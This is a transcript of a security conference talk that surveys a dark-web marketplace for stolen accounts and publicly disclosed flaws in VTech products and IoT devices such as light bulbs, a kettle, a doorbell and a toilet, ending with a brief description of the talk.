We saw quite a bit of news a few months ago where Carnegie Mellon University had apparently demonstrated that if you run enough Tor exit nodes, you can start to de-anonymise traffic, because you can start to see where the traffic goes. But I wanted to show how easy it is to get in here and find things of this class. Drugs and chemicals, weapons, and going down to stuff like fraud. Have a look at what we get under fraud. Dumps. Would you like to buy some dumps? US dumps. What do you want in here? Would you like to buy Spotify accounts? "As seen on Krebs on Security": he is using Brian Krebs in order to promote his stolen Spotify accounts. Two bucks. I assume they are probably about two bucks each. The curious thing about this, and this is what I was touching on in my previous talk, is that this is a marketplace that does not look dissimilar to many of the legitimate marketplaces you see online. We have a seller, and you'll see that we have things like the vendor level, and a trust level in here as well. Everything is nicely categorised, with a good description of it here. They have a whole lot of guidance in here about how to go and use Bitcoin to buy these things in a manner that makes it difficult to trace you. This is how easy it is: it is just a marketplace, you browse around and you buy these things. You can be buying drugs and weapons the same way. Mind you, you have to get those delivered, which is a lot harder than getting Spotify accounts delivered. So that's that one. I find it a really curious thing, just how easily accessible this is. It also helps explain why data breaches are valuable: you can go and sell them. People want to break into systems, your systems, because they can turn around and put the data on the market. It is that easy. Okay, something a little bit different as we start to wrap up. One of the interesting things I have found lately is IoT.
So we have all seen a lot of IoT connected things, right? And we are starting to see vulnerabilities in IoT connected things. Actually, you know what, let's start with VTech. We'll go back to VTech again. I talked about VTech, and they inevitably had vulnerabilities in the APIs behind their IoT things, their tablets. And this was actually some of the data that got taken out. I never got given the photos, which I am quite happy about, but these are the photos of kids, and sometimes their parents, that got leaked. Now curiously, so this was VTech, and all this data got leaked in the October, November timeframe, because they had things like no transport layer security, and they had enumeration risks and SQL injection risks. But the good news is that VTech is now moving on, and they are building home security systems. Holy shit. This is at CES. The reporter I worked with on the VTech data breach took a photo of this and sent it to me. He thought I might find it amusing. I certainly did think some things when I saw this. Probably don't buy these ones. Actually, I've got to feel a little bit sorry for these guys, because they would have had this stuff being built well in advance of the VTech data breach, and inevitably they are totally different teams, totally different places, totally different approaches to security. But I feel sorry for the people working on these products, because they must have seen how bad that VTech data breach was and just gone: oh crap, now we've got to try and sell home security products. Anyway, that brings me to things like this. Some of the interesting IoT stuff we're seeing pop up lately is just kind of ridiculous. I don't think this one is ridiculous, but I'm going to give you some ridiculous examples in a moment too. So this is LIFX, made by an Aussie company, and they are connected light bulbs.
And they are really, really cool, and I like the idea of having an app where I can change the colour of the bulbs and the brightness and everything. I don't want to have to get off the couch to do stuff; this is our lazy lifestyle today. But anyway, LIFX had a vulnerability in the light bulbs. And yes, I know: a vulnerability in the light bulbs. The interesting thing about it, though, is that a lot of people say, with this IoT emergence if you like: look, in a case like this, if there's a vulnerability in the light bulbs, the attackers may be able to control the light bulbs. Do I really care? How much of a threat do I think it is if the attackers can put my house into disco mode and make the lights flash? But the vulnerability they had leaked the network credentials. Right, so now the IoT thing is the attack vector into the network, and I am much more worried about someone having access to my network than I am about them being able to change the colour of my light bulbs. So LIFX came out and said: yes, we had a vulnerability, please patch your light bulbs. How the hell do you patch your light bulbs? I assume you do it with the companion app or something like that. But I guess the curious thing is: are we ready to accept that you have to be able to patch your light bulbs? They also said: don't worry, we are not aware of anyone having been compromised via their light bulbs. Which to me sounds really odd, because think about the attack, right? The attack is that they get access to the network. If you find that someone is in your network, are you ready to blame the light bulbs? Probably not. Now, as weird as this is, and again I would actually like these, they are kind of cool, I have seen two other devices in recent times suffer a similar attack. One is the iKettle. There is an iKettle, and the idea is that you can be lying in bed and turn your kettle on.
Now think about this for a moment, because this is pointless, right? What do you do once the kettle boils, which takes about two minutes? It doesn't bring the water to you; you've still got to get your ass out of bed and go to the kettle. But the vulnerability with the kettle was that they found you could de-auth the kettle from the wireless network, trick the kettle into connecting to your own network, and then Telnet into the kettle with the default PIN. Telnet. Into the kettle. So now you are Telnetted into the kettle using the default PIN, and then you can get the Wi-Fi credentials for the network out of it. Same problem. So that was the second one I saw, and then just the other day, when CES was on, there was a doorbell that had the same problem. A fucking doorbell that connected to the web, and the doorbell was disclosing the credentials of the network. All of this stuff is crazy, but none of it is as crazy as this. Have you seen this? Anyone got one of these? You wouldn't say yes if you did, would you? So this is the LIXIL Satis, and this is real. It's a Japanese toilet. If you've been to Japan, you'll know how crazy they are about their toilets; they're all like rocket ships. And this is the companion app. These are real screenshots; I didn't fabricate these, you can find them on the internet. And you look at them and try to figure out what's happening. Take this middle one. It's in Japanese; I don't know if anyone here speaks Japanese and can tell me, but what do you reckon is happening in the middle screen? Looks like a calendar, like event driven data of some kind. I don't know what. And I love the one in the front too: it looks like it's a music player. I did not fabricate this. The toilet is playing "I Can't Get No Satisfaction". I saw this a couple of years ago and I used it in a talk, and I said: we are now approaching the era where we have to be aware of vulnerabilities in our toilet.
And eventually they had one. Here's the advisory. This is terrifying. Can you imagine this? I showed this at a talk once and someone said: yes, this is known as a backdoor attack. On that note, I think "this is a really terrifying thing" is a good place to end. Let me see if anyone has any questions about what I've just covered. Or are we all just in shock about the fact that this could happen? Any questions, folks? All right, well hey, if you think of anything, put it into the Slido app and we'll be able to cover it later on. I think we'll take, what, about another 15 minute break, Jacob? And then someone else can do some talking. Thanks, guys. Thank you.
There's a huge amount of information to absorb when it comes to web security but as broad as the discipline is, there are common patterns to look for. In this talk on the "essentials" of web security, we'll look beyond the headlines of commonly discussed risks and delve into details and demonstrations. It's a very practical look at online security in a way that everyone can absorb and take back to their everyday work with them. Many of the demos use real world websites and data breaches as examples – this is a very "real world" talk about the importance of web security.